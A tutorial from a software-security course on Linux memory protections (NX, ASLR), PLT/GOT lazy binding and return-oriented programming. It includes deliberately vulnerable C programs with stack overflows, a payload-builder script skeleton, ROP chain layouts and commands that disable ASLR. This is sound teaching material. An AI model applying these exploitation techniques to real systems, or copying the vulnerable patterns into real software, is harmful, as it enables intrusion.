The executable space protection is an instance of the principle of least privilege, which is applied in many security sensitive domains. In this case, the executable space protection is used to limit the types of memory access that a process is allowed to make during execution. A memory region (i.e., page) can have the following protection levels: READ, WRITE, and EXECUTE. The executable space protection mandates that writable regions should not be executable at the same time.
The mechanism can be (and was) implemented in many different ways, the most common in Linux being:
NX bit: This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. This is the current implementation in 64-bit processors, where page table entries are 8 bytes wide.
Physical Address Extension (PAE): Besides the main feature that allows access to more than 4GB of memory, the PAE extension for 32-bit processors also adds an NX bit to its page table entries.
Emulation: The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading the Supervisor bit (PaX PAGEEXEC), or by using the segmentation mechanism and splitting the address space in half (PaX SEGMEXEC).
There are of course other implementations in different hardening-oriented projects such as: OpenBSD W^X, Red Hat Exec Shield, PaX (which is now part of grsecurity), Windows Data Execution Prevention (DEP).
The Linux kernel provides support for managing memory protections in the mmap() and mprotect() syscalls. These syscalls are used by the loader to set protection levels for each segment it loads when running a binary. Of course, the same functions can also be used during execution.
PaX can also restrict the use of mprotect() and mmap() to avoid resetting the permissions during execution. See MPROTECT. Note that grsecurity/PaX are patches to the kernel, and are not available in normal distributions. You have to compile your own kernel if you want to try them out.
Let's start by deactivating ASLR, which is discussed in the following section of this tutorial, and focus only on the NX protection. We can do this in two ways, as shown below:
To disable ASLR system-wide we use (root access is required):
~$ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
To create a shell with ASLR disabled (ASLR will also be disabled for future processes spawned from that shell), we use (root access is not required):
~$ setarch $(uname -m) -R /bin/bash
Let's first compile an extremely simple C application:
int main() { while (1); }
~$ CFLAGS='-m32 -O0' make hello
As presented in 0x03. Static Analysis, the ELF format contains flags for each segment that specify what permissions should be granted. You can use readelf -l hello to dump all program headers for this binary.
Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4
  INTERP         0x000154 0x08048154 0x08048154 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x00568 0x00568 R E 0x1000
  LOAD           0x000f08 0x08049f08 0x08049f08 0x00114 0x00118 RW  0x1000
  DYNAMIC        0x000f14 0x08049f14 0x08049f14 0x000e8 0x000e8 RW  0x4
  NOTE           0x000168 0x08048168 0x08048168 0x00044 0x00044 R   0x4
  GNU_EH_FRAME   0x000490 0x08048490 0x08048490 0x0002c 0x0002c R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10
  GNU_RELRO      0x000f08 0x08049f08 0x08049f08 0x000f8 0x000f8 R   0x1

 Section to Segment mapping:
  Segment Sections...
   00
   01     .interp
   02     .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
   03     .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss
   04     .dynamic
   05     .note.ABI-tag .note.gnu.build-id
   06     .eh_frame_hdr
   07
   08     .init_array .fini_array .jcr .dynamic .got
Check the Flg column. For example, the first LOAD segment contains .text and is marked R E, while the GNU_STACK segment is marked RW.
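The Flg column is a rendering of the p_flags field of each program header. The following is a minimal sketch of that decoding, assuming the standard ELF bit values (PF_X = 1, PF_W = 2, PF_R = 4). The helper names flags_to_str and violates_wx are made up for illustration and are not part of readelf.

```python
# Standard ELF program-header permission bits.
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4

def flags_to_str(p_flags):
    """Render p_flags in the three-column style of readelf's Flg column."""
    return "".join([
        "R" if p_flags & PF_R else " ",
        "W" if p_flags & PF_W else " ",
        "E" if p_flags & PF_X else " ",
    ])

def violates_wx(p_flags):
    """True when a segment is both writable and executable."""
    return bool(p_flags & PF_W) and bool(p_flags & PF_X)

# Flag values matching the segments discussed above.
segments = [
    ("LOAD (text)", PF_R | PF_X),
    ("LOAD (data)", PF_R | PF_W),
    ("GNU_STACK", PF_R | PF_W),
]
for name, flags in segments:
    print(f"{name:12} {flags_to_str(flags)!r} W+X={violates_wx(flags)}")
```

None of the segments in the dump above is writable and executable at the same time, which is what the executable space protection asks for.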
Next we are interested in seeing calls to mmap2() and mprotect() made by the loader. We are going to use the strace tool for this, and directly execute the loader. You can check the path to the loader on your system using ldd hello.
~$ strace -e mmap2,mprotect /lib/ld-linux.so.2 ./hello
[ Process PID=11198 runs in 32 bit mode. ]
mmap2(0x8048000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = 0x8048000
mmap2(0x8049000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = 0x8049000
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7ffc000
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7ffa000
mmap2(NULL, 156324, PROT_READ, MAP_PRIVATE, 3, 0) = 0xfffffffff7fd3000
mmap2(NULL, 1763964, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xfffffffff7e24000
mmap2(0xf7fcd000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a9000) = 0xfffffffff7fcd000
mmap2(0xf7fd0000, 10876, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7fd0000
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7e23000
mprotect(0xf7fcd000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0x56575000, 4096, PROT_READ) = 0
We can observe a PROT_READ|PROT_EXEC mapping at address 0x8048000, followed by a PROT_READ|PROT_WRITE mapping at address 0x8049000 whose first half (4096 bytes) is later changed to PROT_READ. The latter allocation is the data segment, which should be writable. We can also see a bunch of allocations for segments belonging to dynamic libraries.
mmap. Also, the heap will be extended on demand as the application requires it.
We can dump all memory mappings of the still running process as follows:
~$ ps u | grep /lib/ld-linux.so.2
...
~$ cat /proc/11198/maps
Make sure to use the PID of the loader process, not that of the strace process.
~$ cat /proc/11198/maps
08048000-08049000 r-xp 00000000 00:22 5769082 /home/vladum/sss/session10/hello
08049000-0804a000 r--p 00000000 00:22 5769082 /home/vladum/sss/session10/hello
0804a000-0804b000 rw-p 00001000 00:22 5769082 /home/vladum/sss/session10/hello
56555000-56575000 r-xp 00000000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so
56575000-56576000 r--p 0001f000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so
56576000-56577000 rw-p 00020000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so
f7e23000-f7e24000 rw-p 00000000 00:00 0
f7e24000-f7fcd000 r-xp 00000000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so
f7fcd000-f7fcf000 r--p 001a9000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so
f7fcf000-f7fd0000 rw-p 001ab000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so
f7fd0000-f7fd3000 rw-p 00000000 00:00 0
f7ffa000-f7ffd000 rw-p 00000000 00:00 0
f7ffd000-f7ffe000 r-xp 00000000 00:00 0 [vdso]
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
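A dump like this can be checked mechanically for regions that are writable and executable at the same time. Below is a small sketch, assuming the usual /proc/<pid>/maps column layout. The function names are illustrative, and SAMPLE reuses a few lines from the dump above.

```python
def parse_maps(text):
    """Yield (start, end, perms, name) for each line of a /proc/<pid>/maps dump."""
    for line in text.strip().splitlines():
        fields = line.split()
        start, end = (int(x, 16) for x in fields[0].split("-"))
        # Anonymous mappings have no sixth column.
        name = fields[5] if len(fields) > 5 else ""
        yield start, end, fields[1], name

def writable_and_executable(text):
    """Return the mappings that break the W^X rule."""
    return [m for m in parse_maps(text) if "w" in m[2] and "x" in m[2]]

SAMPLE = """\
08048000-08049000 r-xp 00000000 00:22 5769082 /home/vladum/sss/session10/hello
0804a000-0804b000 rw-p 00001000 00:22 5769082 /home/vladum/sss/session10/hello
f7e23000-f7e24000 rw-p 00000000 00:00 0
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
"""

for start, end, perms, name in parse_maps(SAMPLE):
    print(f"{start:#010x}-{end:#010x} {perms} {name}")
print("W+X regions:", writable_and_executable(SAMPLE))
```

To inspect a live process, the same functions can be fed the contents of /proc/<pid>/maps read with open().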
ret-to-plt/libc. You can return to the .plt section and call library functions that are already linked. You can also call other library functions based on their known offsets. The latter approach assumes no ASLR (see next section), or the possibility of an information leak (discussed in the Information Leak session).
Return Oriented Programming (ROP). This is a generalization of the ret-to-* approach that makes use of existing code to execute almost anything. As this is probably one of the most common types of attacks, it will be discussed in depth in a future section.
mprotect(). If the application is using mprotect(), you can call it to modify the permissions and include PROT_EXEC for the stack. You can also call it in a ret-to-libc attack. Alternatively, you can mmap a completely new memory region and place the shellcode there.
Address Space Layout Randomization (ASLR) is a security feature that maps different memory regions of an executable at random addresses. This prevents buffer overflow-based attacks that rely on known addresses such as the stack (for calling into shellcode), or dynamically linked libraries (for calling functions that were not already linked with the target binary). Usually, the sections that are randomly mapped are: the stack, the heap, the VDSO page, and the dynamic libraries. The code section can also be randomly mapped for PIE binaries.
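ASLR on Linux is configured through the /proc/sys/kernel/randomize_va_space file. Writing 0, 1, or 2 to this file results in the following behaviors:
0: randomization is disabled
1: the stack, the VDSO page, and mmap-based regions (including shared libraries) are randomized
2: same as 1, and the heap is also randomized
Make sure you reactivate ASLR after the previous section of the tutorial, using one of the two options below.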
If you disabled ASLR system-wide, re-enable it using (root access is required):
~$ sudo bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space'
If you disabled ASLR at shell level, simply close the shell, for example with the Ctrl+d keyboard shortcut.
We can easily demonstrate the effects on shared libraries by running ldd multiple times in a row on a binary such as /bin/ls.
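The repeated ldd runs can also be scripted. The sketch below assumes ldd prints each library followed by its load address in parentheses. The helper names library_bases and sample_runs are made up for this example, and the script does nothing if ldd is not installed.

```python
import re
import shutil
import subprocess

def library_bases(ldd_output):
    """Map library name -> load address parsed from ldd output."""
    bases = {}
    for line in ldd_output.splitlines():
        m = re.match(r"\s*(\S+).*\((0x[0-9a-fA-F]+)\)\s*$", line)
        if m:
            bases[m.group(1)] = int(m.group(2), 16)
    return bases

def sample_runs(binary="/bin/ls", runs=3):
    """Run ldd several times and return one name -> address dict per run."""
    results = []
    for _ in range(runs):
        out = subprocess.run(["ldd", binary], capture_output=True, text=True).stdout
        results.append(library_bases(out))
    return results

if shutil.which("ldd"):
    for bases in sample_runs():
        # Only show libc to keep the output short.
        print({n: hex(a) for n, a in bases.items() if n.startswith("libc")})
```

With ASLR enabled the printed libc address should change between runs. With ASLR disabled it should stay the same.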
ASLR is not the only feature that prevents the compiler and the linker from solving some relocations before the binary is actually running. Shared libraries can also be combined in different ways, so the first time you actually know the address of a shared library is while the loader is running. The ASLR feature is orthogonal to this: the loader could choose to assign addresses to libraries in a round-robin fashion, or could use ASLR to assign them randomly.
Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the libraries, but this breaks the memory access protection of the .text section, which should only be readable and executable.
To solve this problem we need another level of indirection: all memory accesses to symbols located in shared libraries will read the actual address from a table, called the Global Offset Table (.got), at runtime. The loader will populate this table. Note that this works both for data accesses and for function calls; however, function calls actually use a small stub (i.e., a few instructions) stored in the Procedure Linkage Table (.plt).
The PLT is responsible for finding the shared library function address when it is first called (lazy binding), and writing it to a GOT entry (note that the function pointers are stored in .got.plt). Subsequent calls use the pre-resolved address.
Let's take a quick look at the code generated for a shared library call. You can use any binary you like; we'll just show an example from one that simply calls puts().
~$ objdump -D -j .text -M intel hello | grep puts
80483e4: e8 07 ff ff ff call 80482f0 <puts@plt>
The call jumps to 0x80482f0, which lies inside the .plt section starting at address 0x080482e0:
~$ readelf --sections hello
... [12] .plt PROGBITS 080482e0 0002e0 000040 04 AX 0 0 16 ...
Let's see what the code there looks like:
~$ objdump -D -j .plt -M intel hello | grep -A 3 '<puts@plt>'
080482f0 <puts@plt>:
 80482f0: ff 25 00 a0 04 08    jmp DWORD PTR ds:0x804a000
 80482f6: 68 00 00 00 00       push 0x0
 80482fb: e9 e0 ff ff ff       jmp 80482e0 <_init+0x30>
We see it jumping to a pointer stored at 0x804a000 in the data section. Let's check the binary relocations for that location:
~$ readelf --relocs hello
...
Relocation section '.rel.plt' at offset 0x298 contains 3 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a000  00000107 R_386_JUMP_SLOT   00000000   puts
...
Ok, good, but what is actually stored at this address initially?
~$ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello
hello: file format elf32-i386

Contents of section .got.plt:
 804a000 f6820408 06830408 16830408 ............
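The raw bytes in these listings can be decoded by hand. The sketch below uses only values that appear in the dumps above: the .got.plt dwords are little-endian pointers, and the e8/e9 branches encode a signed 32-bit displacement relative to the end of the instruction. The helper name rel32_target is made up for this example.

```python
import struct

# First three dwords of .got.plt, as printed by objdump -s.
got_plt = bytes.fromhex("f6820408" "06830408" "16830408")
entries = struct.unpack("<3I", got_plt)
print([hex(e) for e in entries])  # ['0x80482f6', '0x8048306', '0x8048316']

def rel32_target(insn_addr, insn_bytes):
    """Target of a 5-byte `call rel32` (e8) or `jmp rel32` (e9) on 32-bit x86."""
    assert len(insn_bytes) == 5 and insn_bytes[0] in (0xE8, 0xE9)
    (disp,) = struct.unpack("<i", insn_bytes[1:])
    # The displacement is relative to the address of the next instruction.
    return (insn_addr + len(insn_bytes) + disp) & 0xFFFFFFFF

# call puts@plt from .text, then the jmp at the end of the puts@plt stub.
print(hex(rel32_target(0x80483E4, bytes.fromhex("e807ffffff"))))  # 0x80482f0
print(hex(rel32_target(0x80482FB, bytes.fromhex("e9e0ffffff"))))  # 0x80482e0
```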
We recognize f6820408 (0x80482f6) as being the next instruction in the puts@plt stub that we disassembled above. The stub then pushes 0 onto the stack and jumps to 0x80482e0. This is the call to the one-time resolver, and it looks like this:
~$ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0'
080482e0 <puts@plt-0x10>:
 80482e0: ff 35 f8 9f 04 08    push DWORD PTR ds:0x8049ff8
 80482e6: ff 25 fc 9f 04 08    jmp DWORD PTR ds:0x8049ffc
 80482ec: 00 00                add BYTE PTR [eax],al
As an exercise, inspect the address stored at 0x8049ffc, and what happens when execution jumps there.
What's going on here? What's actually happening is lazy binding: by convention, when the dynamic linker loads a library, it puts an identifier and a resolution function into known places in the GOT. What happens is roughly this: on the first call of a function, the GOT entry still points back into the PLT stub, so the indirect jump simply lands on the next instruction. The identifier is pushed on the stack and the dynamic linker is called, which at that point has enough information to figure out "hey, this program is trying to find the function foo". It finds the function and patches its address into the GOT, so that the next time the original PLT entry is called, it jumps to the actual address of the function rather than to the lookup stub. Ingenious!
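The sequence described above can be mimicked with a toy model. This is only a sketch of the idea and not how ld.so is implemented: the class ToyLoader and its methods are invented for illustration, a dict stands in for .got.plt, and Python callables stand in for library functions.

```python
class ToyLoader:
    """Toy model of PLT/GOT lazy binding."""

    def __init__(self, libraries):
        self.libraries = libraries  # name -> callable, stands in for shared objects
        self.got = {}               # name -> callable, stands in for .got.plt
        self.resolutions = 0        # how many times the resolver ran

    def plt_stub(self, name):
        """Return the PLT entry for `name`: an indirect jump through the GOT."""
        # Initially the GOT slot leads to the resolver path of the stub.
        self.got[name] = lambda *args: self._resolve(name)(*args)
        # The stub always jumps through whatever the GOT currently holds.
        return lambda *args: self.got[name](*args)

    def _resolve(self, name):
        """One-time resolver: look the symbol up and patch the GOT slot."""
        self.resolutions += 1
        self.got[name] = self.libraries[name]
        return self.got[name]

loader = ToyLoader({"puts": lambda s: len(s)})
puts = loader.plt_stub("puts")
puts("first call goes through the resolver")
puts("second call jumps straight to the target")
print("resolver invoked", loader.resolutions, "time(s)")
```

The caller always goes through the same stub, and only the table entry changes. That is why the code section can stay read-only while the GOT has to be writable.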
In the previous sessions we discussed ret2libc attacks. The standard attack was to overwrite the stack in the following way:
RET + 0x00: addr of system
RET + 0x04: JUNK
RET + 0x08: address of desired command (e.g. '/bin/sh')
However, what happens when you need to call multiple functions? Say you need to call f1() and then f2(0xAB, 0xCD)? The payload should be:
RET + 0x00: addr of f1
RET + 0x04: addr of f2 (return address after f1 finishes)
RET + 0x08: JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called)
RET + 0x0c: 0xAB (param1 of f2)
RET + 0x10: 0xCD (param2 of f2)
What if we need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42)?
RET + 0x00: addr of f1
RET + 0x04: addr of f2 (return address after f1 finishes)
RET + 0x08: 0xAB (param1 of f1)
RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2)
RET + 0x10: 0x42 (param2 of f2)
This kind of conflict can be resolved using Return Oriented Programming, a generalization of ret2libc attacks.
While ret2libc uses functions directly, Return Oriented Programming uses a finer level of code execution: instruction groups. Let's explore an example:
#include <unistd.h>

int main() {
    char a[16];
    read(0, a, 100); /* reads up to 100 bytes into a 16-byte buffer */
    return 0;
}
This code obviously suffers from a stack buffer overflow. The offset to the return address is 28, so dwords from offset 28 onwards will be popped from the stack and used as return addresses. Remember the NOP sled concept from previous sessions? These were long chains of NOP instructions ("\x90") used to pad a payload for alignment purposes. Since we can't add any new code to the program (NX is enabled), how could we simulate the effect of a NOP sled? Easy! Using return instructions!
# objdump -d a -M intel | grep $'\t'ret
 80482dd: c3 ret
 804837a: c3 ret
 80483b7: c3 ret
 8048437: c3 ret
 8048444: c3 ret
 80484a9: c3 ret
 80484ad: c3 ret
 80484c6: c3 ret
Any and all of these addresses will be ok. The payload could be the following:
RET + 0x00: 0x80482dd
RET + 0x04: 0x80482dd
RET + 0x08: 0x80482dd
RET + 0x0c: 0x80482dd
RET + 0x10: 0x80482dd
.....
The original ret (in the normal code flow) will pop RET+0x00 off the stack and jump to it. When the value gets popped, the stack pointer is automatically increased by 4 (on to the next value). The instruction at 0x80482dd is another ret, which does the same thing as before. This goes on until an address is popped off the stack that does not point to a ret.
That payload is not the only option. We don't really care which ret we pick. The payload could very well look like this:
RET + 0x00: 0x80482dd
RET + 0x04: 0x804837a
RET + 0x08: 0x80483b7
RET + 0x0c: 0x8048437
RET + 0x10: 0x80484c6
.....
Notice that the addresses are different, but because they all point to a ret instruction they all have the same net effect on the code flow.
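To make the popping behaviour concrete, here is a tiny simulation of a ret sled. It is a sketch rather than an emulator: it only models ret as "pop a dword into eip", the set of ret addresses is copied from the objdump listing above, and 0xdeadc0de is a placeholder for whatever comes after the sled.

```python
import struct

# Addresses of `ret` instructions taken from the objdump listing above.
RET_ADDRS = {0x80482DD, 0x804837A, 0x80483B7, 0x8048437,
             0x8048444, 0x80484A9, 0x80484AD, 0x80484C6}

def follow_ret_sled(stack_bytes):
    """Pop dwords like consecutive rets would; return (landing address, sled rets executed)."""
    esp, executed = 0, 0
    while True:
        (eip,) = struct.unpack_from("<I", stack_bytes, esp)  # ret: pop eip
        esp += 4
        if eip not in RET_ADDRS:
            return eip, executed
        executed += 1  # eip points at another ret, which pops the next dword

sled = [0x80482DD, 0x804837A, 0x80483B7, 0x8048437, 0x80484C6]
stack = b"".join(struct.pack("<I", a) for a in sled + [0xDEADC0DE])
target, count = follow_ret_sled(stack)
print(hex(target), count)  # 0xdeadc0de 5
```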
#!/usr/bin/env python3
import struct
import sys

def dw(i):
    # Pack i as a little-endian 32-bit dword
    return struct.pack("<I", i)

# TODO update count for your prog
pad_count_to_ret = 100
payload = b"X" * pad_count_to_ret

# TODO figure out the rop chain
payload += dw(0xcafebeef)
payload += dw(0xdeadc0de)

# Write raw bytes; text-mode stdout would re-encode non-ASCII values
sys.stdout.buffer.write(payload)
Now that we have a sort of neutral primitive equivalent to a NOP let's actually do something useful. The building blocks of ROP payloads are called gadgets. These are blocks of instructions that end with a 'ret' instruction. Here are some 'gadgets' from the previous program:
0x8048443: pop ebp; ret
0x80484a7: pop edi; pop ebp; ret
0x8048441: mov ebp,esp; pop ebp; ret
0x80482da: pop eax; pop ebx; leave; ret
0x80484c3: pop ecx; pop ebx; leave; ret
By carefully stitching such gadgets on the stack we can bring code execution to almost any context we want. As an example let's say we would like to load 0x41424344 into eax and 0x61626364 into ebx. The payload should look like:
RET + 0x00: 0x80482da (pop eax; pop ebx; leave; ret)
RET + 0x04: 0x41424344
RET + 0x08: 0x61626364
RET + 0x0c: 0xAABBCCDD ???
pop eax: 0x41424344 is loaded into eax and the stack pointer is increased
pop ebx: 0x61626364 is loaded into ebx and the stack pointer is increased again
leave: two things actually happen: "mov esp, ebp; pop ebp". So the stack frame is collapsed to the previous one (pointed to by ebp) and ebp is updated to the one before that. So esp will now be the old ebp+4
ret: code flow will go to the address stored at the old ebp+4. This implies that execution will not go to 0xAABBCCDD but to some other address that may or may not be in our control (depending on how much we can overflow on the stack). If it is in our control we can overwrite that address with the rest of the ROP chain.
We have now seen how gadgets can be useful if we want the CPU to achieve a certain state. This is particularly useful on other architectures such as ARM and x86_64, where functions do not take parameters from the stack but from registers. As an example, if we want to call f1(0xAB, 0xCD, 0xEF) on x86_64 we first need to know the calling convention for the first three parameters:
1st parameter: RDI
2nd parameter: RSI
3rd parameter: RDX
Next we would need gadgets for each. Let's assume these 2 scenarios:
Scenario 1:
0x400124: pop rdi; pop rsi; ret
0x400235: pop rdx; ret
0x400440: f1()
Payload:
RET + 0x00: 0x400124
RET + 0x08: val of RDI (0xAB)
RET + 0x10: val of RSI (0xCD)
RET + 0x18: 0x400235
RET + 0x20: val of RDX (0xEF)
RET + 0x28: f1
Scenario 2:
0x400125: pop rdi; ret
0x400252: pop rsi; ret
0x400235: pop rdx; ret
0x400440: f1()
Payload:
RET + 0x00: 0x400125
RET + 0x08: val of RDI (0xAB)
RET + 0x10: 0x400252
RET + 0x18: val of RSI (0xCD)
RET + 0x20: 0x400235
RET + 0x28: val of RDX (0xEF)
RET + 0x30: f1
Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide)
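As a sketch, the Scenario 2 payload can be assembled with struct, packing every entry as a little-endian qword. The gadget and function addresses are the illustrative ones from the scenario, not addresses from a real binary, and the padding up to the return address is left out.

```python
import struct

def qw(value):
    """Pack a value as a little-endian 64-bit qword."""
    return struct.pack("<Q", value)

# Illustrative addresses from Scenario 2.
POP_RDI, POP_RSI, POP_RDX, F1 = 0x400125, 0x400252, 0x400235, 0x400440

chain = b"".join(qw(v) for v in [
    POP_RDI, 0xAB,  # rdi = first argument
    POP_RSI, 0xCD,  # rsi = second argument
    POP_RDX, 0xEF,  # rdx = third argument
    F1,             # finally "return" into f1
])
print(len(chain), chain[:8].hex())  # 56 2501400000000000
```

Seven qwords give 0x38 bytes, which matches the last entry of the scenario sitting at RET + 0x30.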
The second use of gadgets is to clear the stack. Remember the issue we had in the Motivation section? Let's solve it using gadgets. We need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42). Our initial solution was:
RET + 0x00: addr of f1
RET + 0x04: addr of f2 (return address after f1 finishes)
RET + 0x08: 0xAB (param1 of f1)
RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2)
RET + 0x10: 0x42 (param2 of f2)
The problem is that those parameters of f1 are getting in the way of calling f2. We need to find a pop pop ret gadget. The actual registers are not important.
RET + 0x00: addr of f1
RET + 0x04: addr of (pop eax, pop ebx, ret)
RET + 0x08: 0xAB (param1 of f1)
RET + 0x0c: 0xCD (param2 of f1)
RET + 0x10: addr of f2
RET + 0x14: JUNK
RET + 0x18: 0xEF (param1 of f2)
RET + 0x1c: 0x42 (param2 of f2)
Now we can even call the next function f3 if we repeat the trick:
RET + 0x00: addr of f1
RET + 0x04: addr of (pop eax, pop ebx, ret)
RET + 0x08: 0xAB (param1 of f1)
RET + 0x0c: 0xCD (param2 of f1)
RET + 0x10: addr of f2
RET + 0x14: addr of (pop eax, pop ebx, ret)
RET + 0x18: 0xEF (param1 of f2)
RET + 0x1c: 0x42 (param2 of f2)
RET + 0x20: addr of f3
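The same layout can be generated programmatically. The helper below is a sketch for 32-bit cdecl-style calls. The name chain_calls and all addresses (F1, F2, POP_POP_RET, JUNK) are hypothetical placeholders that you would replace with values from your own target.

```python
import struct

JUNK = 0x41414141  # return address of the last call; we do not care about it

def dw(value):
    """Pack a value as a little-endian 32-bit dword."""
    return struct.pack("<I", value)

def chain_calls(calls, pop_gadgets):
    """Build a chain from calls = [(func_addr, [args]), ...].

    pop_gadgets maps n to the address of a gadget doing n pops then ret,
    used to step over the n arguments of the call that just returned.
    """
    out = b""
    for i, (func, args) in enumerate(calls):
        last = i == len(calls) - 1
        ret_to = JUNK if last else pop_gadgets[len(args)]
        out += dw(func) + dw(ret_to) + b"".join(dw(a) for a in args)
    return out

# Hypothetical addresses, for illustration only.
F1, F2, POP_POP_RET = 0x08048500, 0x08048540, 0x080484CE
payload = chain_calls([(F1, [0xAB, 0xCD]), (F2, [0xEF, 0x42])], {2: POP_POP_RET})
for off in range(0, len(payload), 4):
    print(f"RET + {off:#04x}: {struct.unpack_from('<I', payload, off)[0]:#x}")
```

Appending a third tuple for f3 reproduces the longer chain: f2 then returns into the pop-pop-ret gadget instead of into JUNK.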
Let's take the following program:
#include <unistd.h>

int main() {
    int x, y, z;
    char a, b, c;
    char buf[23];
    read(0, buf, 100);
    return 0;
}
A fairly simple overflow, right? How fast can you figure out the offset to the return address? How much padding do you need? There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly.
A De Bruijn sequence is a string of symbols out of a given alphabet in which every substring of K consecutive symbols appears only once in the whole string. If we can construct such a string out of printable characters, then we only need to know the address at which the Segmentation Fault occurred. Converting that address back to 4 bytes and searching for them in the initial string gives us the exact offset to the return address.
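For illustration, here is a generic generator for such a sequence together with the offset lookup. It uses the standard recursive construction and an arbitrary 8-letter alphabet, so its output will not match the pattern produced by peda, and the function names are made up for this sketch.

```python
import struct

def de_bruijn(alphabet, n):
    """Return a de Bruijn sequence of order n over `alphabet`."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)

def offset_of(pattern, crash_value):
    """Offset of the 4 bytes that ended up in a 32-bit register (little-endian)."""
    return pattern.find(struct.pack("<I", crash_value).decode("ascii"))

pattern = de_bruijn("ABCDEFGH", 4)[:200]
# Pretend the program crashed with EIP holding the bytes at offset 35.
crash = struct.unpack("<I", pattern[35:39].encode())[0]
print(offset_of(pattern, crash))  # 35
```

Because every 4-character window is unique, the lookup cannot return an ambiguous offset.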
Peda can help you do this. Here's how:
gdb-peda$ help pattern_create
Generate a cyclic pattern
Usage:
    pattern_create size [file]
gdb-peda$ pattern_create 100
'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl'
gdb-peda$ help pattern_offset
Search for offset of a value in cyclic pattern
Usage:
    pattern_offset value
gdb-peda$ pattern_offset AA8A
AA8A found at offset: 76
Things can even get more complex: if you insert such patterns as input to the program you can search for signs of where it got placed using peda. Here's how to figure out the offset to the return address in 3 commands for the previous program as promised:
# gdb -q ./a
Reading symbols from ./a...(no debugging symbols found)...done.
gdb-peda$ pattern_create 200
'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A'
gdb-peda$ run
AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0xf7f97e54 --> 0x1a6d5c
ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
EDX: 0x64 ('d')
ESI: 0x0
EDI: 0x0
EBP: 0x41334141 ('AA3A')
ESP: 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
EIP: 0x41414541 ('AEAA')
EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414541
[------------------------------------stack-------------------------------------]
